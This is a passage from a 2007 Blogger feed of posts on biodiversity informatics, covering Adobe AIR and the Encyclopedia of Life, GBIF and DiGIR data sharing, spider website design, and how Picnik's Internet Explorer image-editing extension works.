scheme='http://www.blogger.com/atom/ns#' term='EoL'/><title type='text'>Biodiversity on the Desktop</title><content type='html'>&lt;a 
href="http://4.bp.blogspot.com/_VYUFlXOCOxE/Rp_PZ1qLSkI/AAAAAAAAAB8/WD2YqBHyc8o/s1600-h/adobe_air.gif"&gt;&lt;img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;" src="http://4.bp.blogspot.com/_VYUFlXOCOxE/Rp_PZ1qLSkI/AAAAAAAAAB8/WD2YqBHyc8o/s320/adobe_air.gif" border="0" alt=""id="BLOGGER_PHOTO_ID_5089014146759608898" /&gt;&lt;/a&gt;&lt;br /&gt;In earlier &lt;a href="http://ispiders.blogspot.com/2007/05/living-encyclopedia-myeol.html"&gt;posts&lt;/a&gt;, I described my vision of an &lt;a href="http://www.eol.org"&gt;Encyclopedia of Life&lt;/a&gt; (EoL) where the web and your desktop environment are blurred or mashed together. In such a manner, I envisioned a tool where users and contributors to EoL could maintain either a public or private working space to mix and mash data from multiple sources with those on their own hard drives.&lt;br /&gt;&lt;br /&gt;One of the grandiose dreams I had was the ability to create a private, content management-like community within EoL in which co-authors of a proposed manuscript like a taxonomic revision could merge their datasets, grab data from third party sources if useful (&lt;em&gt;e.g.&lt;/em&gt; GenBank, GBIF, &lt;em&gt;etc.&lt;/em&gt;), and collectively work on the manuscript. Upon completion of the manuscript, there may be some elements of use to EoL that the authors could later push out, which in no way diminishes the value of their publication or would cause editors to frown and reject the paper, but offers immediate value to the public at large. Granted, I'm not totally clear on how this will work, but I really don't think it would be completely unrealistic. But what I can't stress enough is that EoL cannot be like WikiSpecies where contributors have to sit and author content solely for use in WikiSpecies. Rather, it absolutely must have a system that can somehow slip into the workflow of biologists. 
I'm now convinced that such a vision is not science fiction.&lt;br /&gt;&lt;br /&gt;I watched a few Adobe AIR (Adobe Integrated Runtime - code named Apollo) videos this morning and got thoroughly fired-up about the possibilities. Google has been working on an offline API, which looks pretty good, but AIR blows all this out of the water because it allows a developer to maintain an application's presence on the desktop. Further, it can be integrated into the operating system. So, imagine working on a manuscript with a handful of colleagues and being notified with a desktop toast pop-up when one of them has completed his/her revisions or sections of the manuscript, or when a dataset in EoL suddenly becomes available while the manuscript is being prepared.&lt;br /&gt;&lt;br /&gt;The really cool thing from a web developer's perspective is that AIR uses existing web programming tools, &lt;em&gt;i.e.&lt;/em&gt; the learning curve to create these cross-platform applications is quite shallow because code can be repurposed for either the web or the desktop...at least that's the impression I get from watching a few of these videos. Here's &lt;a href="http://onair.adobe.com/blogs/videos/2007/03/11/christian-cantrell-demos-apollo/"&gt;one such video&lt;/a&gt; where Christian Cantrell demonstrates a few simple applications built on AIR...just mentally substitute Amazon for EoL and you get my drift.&lt;br /&gt;&lt;br /&gt;Now, all this stuff is really cool and there is indeed the potential for EoL or the totally unknown "MyEoL" to truly transform the science of biology because it can &amp; should slip into biologists' workflows. Of course, there's no reason why multiple flavours of these AIR desktop applications couldn't be built for children, amateur naturalists, scientists, or however EoL sees its user base. 
In fact, what I'd really like to see is a BioBlitz class of user where observational data can be merged across interest groups at any geographic scale in their respective desktop applications. An Encyclopedia is great, but we ultimately want people to use the encyclopedia and go outside with fellow human beings to look at, count, touch, or otherwise experience life on our planet. Each flavour of the desktop application can be customized to do different chores or expose different aspects of the EoL system to various classes of end users. The first step then is to nail the needs and design these applications around them. So, here are a few questions to kick-start this process, at least for biologists/systematists who are excited about EoL but just don't believe there will ever be time for them to contribute content:&lt;br /&gt;&lt;br /&gt;1. When conducting a taxonomic revision, what are the significant organizational and communications impediments that have slowed down the process?&lt;br /&gt;2. What data sets are vital to conducting an effective revision?&lt;br /&gt;3. What desktop software applications are critical when conducting a revision? [remember, because AIR is on the desktop, there may be an opportunity here to automate file type transformations produced by one provider/database/spreadsheet to the applications required to actually analyze the data]&lt;br /&gt;&lt;br /&gt;#2 above will be a challenge and will require that data providers produce similarly structured APIs (&lt;em&gt;e.g.&lt;/em&gt; DiGIR, TAPIR, OpenSearch, and the like). This, I believe, is where EoL has to take firm leadership. What it needs now is a demo application like that produced by Adobe and Christian Cantrell so we can all visualize this dream. Currently, the EoL dream is very fuzzy and has led to a lot of miscommunication and confusion, &lt;em&gt;e.g.&lt;/em&gt; isn't this just WikiSpecies? 
THEN, EoL absolutely must write some recipes for content providers to start sharing their data in a manner like what Google does with their Google Maps API. The selling point will be iconographic and link-back attribution for content providers, which can be constructed already if all content providers used a system like OpenSearch, MediaRSS, GeoRSS, and various other RSS flavours to open their doors.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-5673283253336777174?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/5673283253336777174/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=5673283253336777174' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/5673283253336777174'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/5673283253336777174'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2007/07/biodiversity-on-desktop.html' title='Biodiversity on the Desktop'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_VYUFlXOCOxE/Rp_PZ1qLSkI/AAAAAAAAAB8/WD2YqBHyc8o/s72-c/adobe_air.gif' height='72' 
width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-4037349608760680022</id><published>2007-07-04T13:30:00.000-06:00</published><updated>2007-07-04T14:34:01.944-06:00</updated><title type='text'>Digital Species Descriptions &amp; the new GBIF portal</title><content type='html'>The Biodiversity Information Standards (previously known as TDWG, the Taxonomic Databases Working Group) has recently rolled out a new subgroup called "&lt;a href="http://wiki.tdwg.org/twiki/bin/view/SPM/WebHome"&gt;Species Profile Model&lt;/a&gt;" led by Éamonn Ó Tuama (GBIF). Thirteen people attended a workshop April 16-18, 2007 in Copenhagen, DK shortly after the Encyclopedia of Life &lt;a href="http://eolinformatics.mbl.edu/index.html"&gt;informatics workshop&lt;/a&gt; in Woods Hole, MA. The point of this Copenhagen workshop was to hash out a specification to support the retrieval and integration of data with the lofty goal of "reaching consensus and avoiding fragmentation" of existing species-level initiatives. I'm all for this, but I wonder if it will work? I believe "consensus" as it's described here is meant to be a common way of presenting the data rather than a true taxonomic, ecological, or political consensus. A specification does not preclude the possibility for several variants of a species profile served from multiple (or even the same) provider. These could of course have conflicting or dated information and ultimately result in misleading COSEWIC-type recommendations. So, what about consensus as we usually define it? Or, is that beyond the responsibility of this subgroup?&lt;br /&gt;&lt;br /&gt;A standard for specimen data (Darwin Core, ABCD, etc.) is obvious, but I'm not convinced that a standard for species descriptions is wise unless such a standard were developed and solely hosted by the nomenclators and sanctioned by the various Codes. 
A standard for species descriptions without ties to the nomenclators and the authors who conducted the original species description or revision merely democratizes fluff. Before a standard Species Profile Model is put into practise, such RDF representations have to at least explicitly incorporate peer review, authorship, and a date stamp.&lt;br /&gt;&lt;br /&gt;I also noticed that the Species Profile Model is attempting to integrate citations to scientific literature. I suggest the team take a good close look at &lt;a href="http://www.exlibrisgroup.com/sfx_openurl_syntax.htm"&gt;OpenURL&lt;/a&gt;, which lends itself to useful functionality when building lists of references in front-end applications (see Rod Page's &lt;a href="http://iphylo.blogspot.com/2007/06/making-taxonomic-literature-online.html"&gt;post in iPhylo&lt;/a&gt; on this very subject and several posts in this blog). The OpenURL format will influence how the elements in the proposed Species Profile Model ought to be constructed.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://2.bp.blogspot.com/_VYUFlXOCOxE/RowAJ9k0stI/AAAAAAAAAB0/avJyyz-qBAM/s1600-h/gbif_05.jpg"&gt;&lt;img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;" src="http://2.bp.blogspot.com/_VYUFlXOCOxE/RowAJ9k0stI/AAAAAAAAAB0/avJyyz-qBAM/s320/gbif_05.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5083438250542281426" /&gt;&lt;/a&gt; On other fronts, GBIF just rolled out their new portal: &lt;a href="http://data.gbif.org"&gt;http://data.gbif.org&lt;/a&gt;. It looks as if the whole index and back-end was reconstructed and there remain some missing provider data tables. In time, these will probably blink on as they were presented via the old portal. What I appreciate seeing for the first time is a concerted effort to give providers some auto-magic feedback about what is being served from their boxes. 
Vetting data is a very important part of federation and I hope &lt;a href="http://data.gbif.org/datasets/"&gt;providers&lt;/a&gt; sit up and take notice. GBIF calls these "event logs", which is too obtuse. I'd like to see this called "Questionable Data Served from this Provider", "Problem Records", or "The Crap You're Serving the Scientific Community", or something similar. "Event logs" is easily dismissed and overlooked. For example, here are the event logs for the University of Alaska Museum of the North Mollusc Collection: &lt;a href="http://data.gbif.org/datasets/resource/967/logs/"&gt;http://data.gbif.org/datasets/resource/967/logs/&lt;/a&gt;. GBIF also has a flashy new logo &amp; plenty of easy to use web services.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-4037349608760680022?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/4037349608760680022/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=4037349608760680022' title='4 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/4037349608760680022'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/4037349608760680022'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2007/07/digital-species-descriptions-new-gbif.html' title='Digital Species Descriptions &amp; the new GBIF portal'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><media:thumbnail 
xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_VYUFlXOCOxE/RowAJ9k0stI/AAAAAAAAAB0/avJyyz-qBAM/s72-c/gbif_05.jpg' height='72' width='72'/><thr:total>4</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-6501083395114513570</id><published>2007-06-19T19:58:00.000-06:00</published><updated>2007-10-06T14:15:36.071-06:00</updated><title type='text'>DiGIR for Collectors</title><content type='html'>&lt;a href="http://3.bp.blogspot.com/_VYUFlXOCOxE/RniWYs3qwoI/AAAAAAAAABU/dQp6ryBNmgY/s1600-h/headerH1BG.jpg"&gt;&lt;img id="BLOGGER_PHOTO_ID_5077973930965910146" style="FLOAT: right; MARGIN: 0px 0px 10px 10px; CURSOR: hand" alt="" src="http://3.bp.blogspot.com/_VYUFlXOCOxE/RniWYs3qwoI/AAAAAAAAABU/dQp6ryBNmgY/s320/headerH1BG.jpg" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;The &lt;a href="http://www.gbif.org/"&gt;Global Biodiversity Information Facility&lt;/a&gt; (GBIF) has done an excellent job at designing the infrastructure to support the federation of specimen and observation data. The majority of contributing institutions use &lt;a href="http://digir.sourceforge.net/"&gt;Distributed Generic Information Retrieval&lt;/a&gt; (DiGIR), an open-source PHP-based package that nicely translates columns of data in one's dedicated database (e.g. MySQL, SQL Server, Oracle, etc.) into &lt;a href="http://wiki.tdwg.org/twiki/bin/view/DarwinCore/WebHome"&gt;Darwin Core&lt;/a&gt; fields. So, even if your data columns don't match the Darwin Core schema, you can use the DiGIR configurator to match your columns to what's needed at GBIF's end. Europeans tend to prefer &lt;a href="http://wiki.tdwg.org/twiki/bin/view/ABCD/WebHome"&gt;Access to Biological Collection Data&lt;/a&gt; (ABCD) as their transport mechanism. The functionality of these will soon be rolled into the &lt;a href="http://wiki.tdwg.org/twiki/bin/view/TAPIR/WebHome"&gt;TDWG Access Protocol for Information Retrieval&lt;/a&gt; (TAPIR). 
To the uninitiated like me, this is a jumbled, confusing alphabet soup and at first I couldn't navigate this stuff.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/_VYUFlXOCOxE/Rnio083qwpI/AAAAAAAAABc/l-PUH38Gnrg/s1600-h/logo.gif"&gt;&lt;img id="BLOGGER_PHOTO_ID_5077994207506514578" style="FLOAT: left; MARGIN: 0px 10px 10px 0px; CURSOR: hand" alt="" src="http://4.bp.blogspot.com/_VYUFlXOCOxE/Rnio083qwpI/AAAAAAAAABc/l-PUH38Gnrg/s320/logo.gif" border="0" /&gt;&lt;/a&gt;Suffice it to say, the documentation isn't particularly great on either the TDWG or GBIF web sites. To the TDWG folks: &lt;em&gt;a screencast with step by step install for both Windows &amp; Linux would go a long way! I don't mean a flashy Encyclopedia of Life webcast, I mean a basic TDWG for Dummies.&lt;/em&gt; If you have a dedicated database and a web server that can push PHP-based pages, it's actually pretty straight forward once you get going. It's really just a matter of jumping through a few simple hoops. Click here; do this; match this; click there - not much more difficult than managing an Excel datasheet. The downloads &amp; step by steps for DiGIR can be found &lt;a href="http://circa.gbif.net/Public/irc/gbif/ict/library?l=/digir_provider_package"&gt;HERE&lt;/a&gt;. &lt;strong&gt;The caveat&lt;/strong&gt;: you need a dedicated database, a dedicated web server, and you need your resource to be recognized by a GBIF affiliate before it's registered for access. That's unfortunately how all this stuff works.&lt;br /&gt;&lt;br /&gt;So what about the casual or semi-professional collector that may have much larger collections than what can be found in museums? It's not terribly likely countless, hard-working people like these have the patience to fuss with dedicated databases (we're not talking Excel here) or web servers. Must they wait to donate their specimens to a museum before these extremely valuable data are made accessible? 
In many cases, a large donation of specimens to a museum sits in the corner and never gets accessioned because there simply isn't the human power at the receiving end to manage it all. Heck, some of the pre-eminent collections in the world don't even have staff to receive donations of any size! This is a travesty.&lt;br /&gt;&lt;br /&gt;An attractive solution to this is to complement DiGIR/ABCD/TAPIR with a fully online solution akin to &lt;a href="http://docs.google.com/"&gt;Google Spreadsheets&lt;/a&gt;. For the server on the other end, this means a beefy pipe and a hefty set of machines to cope with this AJAX-style, rapid &amp;amp; continuous access. But, for small taxa-centric communities, this isn't a problem. In fact, I developed such a Google Spreadsheet-like function in The Nearctic Spider Database for collectors wanting to manage their spider data.&lt;br /&gt;&lt;br /&gt;&lt;div style="width:425px;margin:0px auto"&gt;&lt;object width="425" height="350"&gt; &lt;param name="movie" value="http://www.youtube.com/v/IVmoijJ8iro"&gt; &lt;/param&gt; &lt;embed src="http://www.youtube.com/v/IVmoijJ8iro" type="application/x-shockwave-flash" width="425" height="350"&gt; &lt;/embed&gt; &lt;/object&gt;&lt;br&gt;&lt;div style="font-size:x-small;float:right"&gt;Turn Up Volume!&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;Watch the video above or &lt;a href="http://www.canadianarachnology.org/data/canada_spiders/screencasts/DataManagement/"&gt;HERE&lt;/a&gt; (better resolution). Everything is hosted on one machine on a residential Internet connection &amp; I have had up to 5 concurrent users + all the usual 2,500 - 3,500 unique visitors a day with no appreciable drop in performance. Granted things are a little slower in these instances, but the alternative is no aggregation of data at all. To help users that each have their own table in the database, I designed some easy and useful tools. 
For example, they may query their records for nomenclatural issues, do some real-time reverse geocoding to verify that their records are actually in the State or Province they specified, check for duplicates, among a few other goodies like mapping everything as clickable pushpins in Google Map. Of course, one can export as Excel or tab-delimited text files at any time. The other advantage to such a system is that upon receiving user feedback and requests, I can quickly add new functions &amp;amp; these are immediately available to all users. I don't have to stamp and mail out new CDs, urge them to download an update, or maintain versions of various releases. If you're curious about wanting to do the same sort of thing for your interest group, check out &lt;a href="http://dowdybrown.com/"&gt;Rico LiveGrid Plus&lt;/a&gt;, the code base upon which I built the application.&lt;br /&gt;&lt;br /&gt;What would be really cool is if this sort of thing could be made into a &lt;a href="http://drupal.org/"&gt;Drupal&lt;/a&gt;-like module &amp; bundled into &lt;a href="http://www.ubuntu.com/products/WhatIsUbuntu/serveredition"&gt;Ubuntu Server Edition&lt;/a&gt;. A taxon focal group with a community of say 20-30 contributors could collectively work on their collection data in such a manner &amp;amp; never have to think about the tough techno stuff. 
They'd buy a cheap little machine for $400, slide the CD into the drive to install everything &amp; away they go.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/_VYUFlXOCOxE/Rniya83qwqI/AAAAAAAAABk/hzporpGXtcI/s1600-h/100014192753__V46777512_.gif"&gt;&lt;img id="BLOGGER_PHOTO_ID_5078004755946193570" style="FLOAT: left; MARGIN: 0px 10px 10px 0px; CURSOR: hand" alt="" src="http://4.bp.blogspot.com/_VYUFlXOCOxE/Rniya83qwqI/AAAAAAAAABk/hzporpGXtcI/s320/100014192753__V46777512_.gif" border="0" /&gt;&lt;/a&gt;The real advantage to the on-line data management application in the Nearctic Spider Database is the quick access to the nomenclatural data. So, the Catalog of Life Partnership &amp;amp; other major pools of names ought to think about simple web services upon which such a plug-and-go system can draw their names. It's certainly valuable to have a list of vetted names such as what ITIS and Species2000 provide, but to really sell them to funding agencies they no doubt have to demonstrate how the names are being used. Web services bundled with a little plug-and-go CD would allow small interest groups to hit the ground running. Such a tool would give real-world weight to this business of collecting names and would go a long way toward avoiding the shell games these organizations probably have to play. I suspect these countless small interest groups would pay a reasonable, annual subscription fee to keep the names pipes open. Agencies already exist to help monetize web services using such a subscription system. Perhaps it's worth thinking like an Amazon Web Service (AWS) where users pay for what they use. 
Unlike AWS however, incoming monies would only support the Catalog of Life Partnership wages and infrastructure to take some weight off chasing grants.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-6501083395114513570?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/6501083395114513570/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=6501083395114513570' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/6501083395114513570'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/6501083395114513570'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2007/06/digir-for-collectors.html' title='DiGIR for Collectors'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_VYUFlXOCOxE/RniWYs3qwoI/AAAAAAAAABU/dQp6ryBNmgY/s72-c/headerH1BG.jpg' height='72' width='72'/><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-6826875200423623343</id><published>2007-06-18T22:32:00.000-06:00</published><updated>2007-06-18T23:44:04.494-06:00</updated><title type='text'>Impossibility of Discovery</title><content type='html'>For the past couple of years, I have scoured the Internet for spider-related imagery and resources. I think I have a pretty good handle on it. 
But, there are some gems out there that are nearly impossible to find. The discoverability issue has a lot to do with poor web design and that means little to absolutely no consideration for how search engine bots work. While it's commendable to put all that content on a website, it's equally important to ensure the work can be discovered. Many of the authors below should look at some of the offerings in &lt;a href="http://www.webpagesthatsuck.com/"&gt;Web Pages That Suck&lt;/a&gt; and pay close attention to the list of &lt;a href="http://www.webpagesthatsuck.com/biggest-mistakes-in-web-design-1995-2015.html"&gt;web design mistakes&lt;/a&gt;. Without good design, what's the point? Let it be clear that I'm not knocking the content; these are extremely valuable and obviously very time-consuming works. However, consideration must be given to the end user. Why not just get these works ready for a book &amp; let a typesetter and layout editor handle the esthetics? A few of these examples are (in no particular order):&lt;br /&gt;&lt;br /&gt;&lt;ol&gt;&lt;br /&gt;&lt;li&gt;&lt;a href="http://www.spiderling.de/arages/Fotogalerie/Fotogalerie.htm"&gt;Nachweiskarten der Spinnentiere Deutschlands&lt;/a&gt;&lt;/li&gt;&lt;br /&gt;&lt;li&gt;&lt;a href="http://www.andtan.newmail.ru/list/"&gt;Linyphiid Spiders of the World&lt;/a&gt;&lt;/li&gt;&lt;br /&gt;&lt;li&gt;&lt;a href="http://www.arachnodata.ch/welcome.htm"&gt;Arachnodata&lt;/a&gt;&lt;/li&gt;&lt;br /&gt;&lt;li&gt;&lt;a href="http://www.geocities.com/RainForest/Vines/5197/main.html"&gt;Aracnis&lt;/a&gt;&lt;/li&gt;&lt;br /&gt;&lt;li&gt;&lt;a href="http://www.araneae.unibe.ch/"&gt;Central European Spiders - Determination Key&lt;/a&gt;&lt;/li&gt;&lt;br /&gt;&lt;/ol&gt;&lt;br /&gt;&lt;br /&gt;Three words: kill the frames. 
If you have to use a frameset, give the user the option to turn it on or off.&lt;br /&gt;&lt;br /&gt;Other sites have been improving dramatically like Jørgen Lissner's &lt;a href="http://www.jorgenlissner.dk/"&gt;Spiders of Europe&lt;/a&gt;. But, it's worth thinking about a search function and also hiding the backend technology by creating URIs (i.e. aspx might be your preferred programming language, but what if you decide one day to switch to Apache and PHP?). A bit of server-side URL re-writing can go a long way to ensure longterm access to your content. If you switch to Apache, MySQL, and serve content via PHP, you can make use of Apache's mod_rewrite...none of your incoming links break.&lt;br /&gt;&lt;br /&gt;Some pointers:&lt;br /&gt;&lt;br /&gt;If you're going to use drop-down menus, please, please make them useful &amp; hierarchical by using some simple AJAX to submit a form and adjust the options. Nothing is more frustrating than scrolling through an endless list of species only to find the one you're looking for is not there or to select a species only to find no content. A list of taxonomic references is at least &lt;i&gt;some&lt;/i&gt; content even if that may seem rather thin. If Google and other search engines are having a rough time indexing your content, it is equally rough on end users. Another point is to lose the mindset that you're working with paper - the web is a highly interactive place and visitors have short attention spans. Limit the content to the most important bits. Use a pale background and dark-coloured text. Not only is printing web sites that use the reverse a pain, you are also saying, "I haven't thought about people with less than perfect vision." I could go on and on, but I'll leave it at that.&lt;br /&gt;&lt;br /&gt;If you want a web site with hundreds of arachnid-related links, visit the &lt;a href="http://www.arachnology.be/Arachnology.html"&gt;Arachnology Homepage&lt;/a&gt;. 
Herman Vanuytven puts a lot of time into trying to make sense of all the arachnid content out there.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-6826875200423623343?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/6826875200423623343/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=6826875200423623343' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/6826875200423623343'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/6826875200423623343'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2007/06/impossibility-of-discovery.html' title='Impossibility of Discovery'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-247895766369739579</id><published>2007-06-17T21:48:00.000-06:00</published><updated>2007-06-17T22:53:09.795-06:00</updated><title type='text'>Sociology &amp; Gabbing Web Images</title><content type='html'>&lt;a href="http://4.bp.blogspot.com/_VYUFlXOCOxE/RnYHbc3qwnI/AAAAAAAAABM/aAW1qU3rg58/s1600-h/picnic2.jpg"&gt;&lt;img style="float:right; margin:0 0 10px 10px;cursor:pointer; cursor:hand;" src="http://4.bp.blogspot.com/_VYUFlXOCOxE/RnYHbc3qwnI/AAAAAAAAABM/aAW1qU3rg58/s320/picnic2.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5077253798094357106" /&gt;&lt;/a&gt;&lt;br /&gt;Admittedly, I'm a Flickr noob 
and only recently made an account for myself. I'm not entirely pleased with the interface because frankly, it's too busy and inconsistent for my liking. However, I just stumbled across &lt;a href="http://www.picnik.com"&gt;Picnik&lt;/a&gt;. From their FAQ:&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;&lt;p&gt;&lt;strong&gt;What is Picnik?&lt;/strong&gt;&lt;br /&gt;Picnik is photo editing awesomeness, online, in your browser. It's the easiest way on the Web to fix underexposed photos, remove red-eye, or apply effects to your photos. &lt;/p&gt;&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;Not only that, it is well hooked into Flickr, Facebook and a number of other sites. What struck me about one of the features in their somewhat hidden tools are Firefox and Internet Explorer extensions. Now, extensions in Firefox are relatively easy to construct, but Internet Explorer extensions are a bit of a pain. So, I was curious to see what they did. It is a registry hack that contains the following:&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;&lt;p&gt;Windows Registry Editor Version 5.00; See http://msdn.microsoft.com/workshop/browser/ext/tutorials/context.asp for details&lt;br /&gt;[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\Edit in &amp;Picnik] @="http://www.picnik.com/extensions/ie-import.html"&lt;br /&gt;"Contexts"=dword:00000002&lt;/p&gt;&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/_VYUFlXOCOxE/RnYEgc3qwmI/AAAAAAAAABE/n52gzmyfSKE/s1600-h/picnic.jpg"&gt;&lt;img style="float:right; margin:0 0 10px 10px;cursor:pointer; cursor:hand;" src="http://4.bp.blogspot.com/_VYUFlXOCOxE/RnYEgc3qwmI/AAAAAAAAABE/n52gzmyfSKE/s320/picnic.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5077250585458819682" /&gt;&lt;/a&gt;That hack installs an option in the right-click context menu within Internet Explorer. When the hack is installed, you may right-click any image on a web page and choose "Edit in Picnik". 
I tried it and of course, the URL to the image is seamlessly grabbed and the image is immediately available in Picnik for editing using its rich array of very easy to use tools.&lt;br /&gt;&lt;br /&gt;Being naturally curious, I pointed my browser to the URL in the above registry hack, http://www.picnik.com/extensions/ie-import.html, and was presented with a web page alert whose source was the following:&lt;br /&gt;&lt;br /&gt;&amp;lt;html&amp;gt;&amp;lt;body&amp;gt;&lt;br /&gt;&amp;lt;script&amp;gt;&lt;br /&gt;// See http://msdn.microsoft.com/workshop/browser/ext/tutorials/context.asp for details&lt;br /&gt;try {&lt;br /&gt; var wndParent = external.menuArguments;&lt;br /&gt; var strImportURL = wndParent.event.srcElement.src;&lt;br /&gt; wndParent.location = "http://www.picnik.com/?import=" + strImportURL;&lt;br /&gt;} catch (ex) {&lt;br /&gt; alert("Unable to import image. Let us know at feedback@picnik.com");&lt;br /&gt;}&lt;br /&gt;&amp;lt;/script&amp;gt;&lt;br /&gt;Edit in Picnik for Internet Explorer&lt;br /&gt;&amp;lt;/body&amp;gt;&amp;lt;/html&amp;gt;&lt;br /&gt;&lt;br /&gt;So, it seems the registry hack merely calls the URL to an image and feeds it as a querystring parameter into Picnik. Pretty slick. But there's more...&lt;br /&gt;&lt;br /&gt;You can grab any image like this, edit it in Picnik, then seamlessly send it to your Flickr account using the behind-the-scenes Flickr API. Technically, you never have to interface with the busy Flickr site. Almost everything can be done within Picnik: grabbing an image from your hard drive, a web site, etc., editing it using its fully online, smooth and easy to use image editing tools, then pushing the result out to Flickr or Facebook, sending it via email, saving it back to your hard drive, plus a number of other export options. 
Wow.&lt;br /&gt;&lt;br /&gt;Grabbing images like this off a web page &amp; then sending them off to Flickr certainly has some serious copyright issues and speaks volumes about the sociology of the web culture. These are exactly the kinds of content ownership issues that seem not to faze other emerging application developers like those behind &lt;a href="http://www.zude.com"&gt;Zude&lt;/a&gt; or &lt;a href="http://www.zcubes.com"&gt;ZCubes&lt;/a&gt;. Where's the justice? Do &lt;a href="http://creativecommons.org/"&gt;Creative Commons&lt;/a&gt; licenses make a whole hill of beans worth of difference when there are tools like these? I tried to get this notion across to the participants &amp; contributors in/to &lt;a href="http://bugguide.net"&gt;BugGuide&lt;/a&gt; (see &lt;a href="http://bugguide.net/node/view/112709"&gt;discussion&lt;/a&gt;) as encouragement to think about an API to propagate their great work in other resources like the &lt;a href="http://www.eol.org"&gt;Encyclopedia of Life&lt;/a&gt;. There are lots of synergistic reasons for building a simple API. BugGuide is a rich, longstanding, community-driven resource for people to post their images of NA arthropods, author guide pages, discuss issues in a forum, among other really useful functions. Getting nomenclatural data from an Encyclopedia of Life API would be one simple example of potential information flow back to BugGuide.&lt;br /&gt;&lt;br /&gt;One of the shortcomings of Picnik, Zude, and ZCubes is that there is no way to retain any accreditation other than the host domain for where the image was "ripped". It also means that MediaRSS extensions for RSS 2.0 or the FOAF and Dublin Core vocabularies for RSS 1.0 are entirely useless in this context because they aren't being used even if the data were available. What I think Picnik, Zude, and ZCubes (&amp; Flickr too for that matter) ought to consider is an embedded metadata reader/writer for images. 
